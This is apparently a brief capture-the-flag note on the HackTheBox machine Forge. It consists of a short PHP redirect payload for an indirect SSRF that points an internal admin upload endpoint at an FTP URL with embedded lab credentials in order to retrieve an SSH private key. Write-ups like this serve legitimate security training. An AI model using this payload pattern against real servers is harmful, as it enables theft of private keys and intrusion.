Post

SSRF & Python Debugger - Forge @ HackTheBox

SSRF & Python Debugger - Forge @ HackTheBox

We are solving Forge, a medium difficulty Linux machine on HackTheBox which involves an SSRF & playing with the python debugger.

Notes

Indirect SSRF

1
2
3
<?php
header("Location:  http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@forge.htb/.ssh/id_rsa");
?>
This post is licensed under CC BY 4.0 by the author.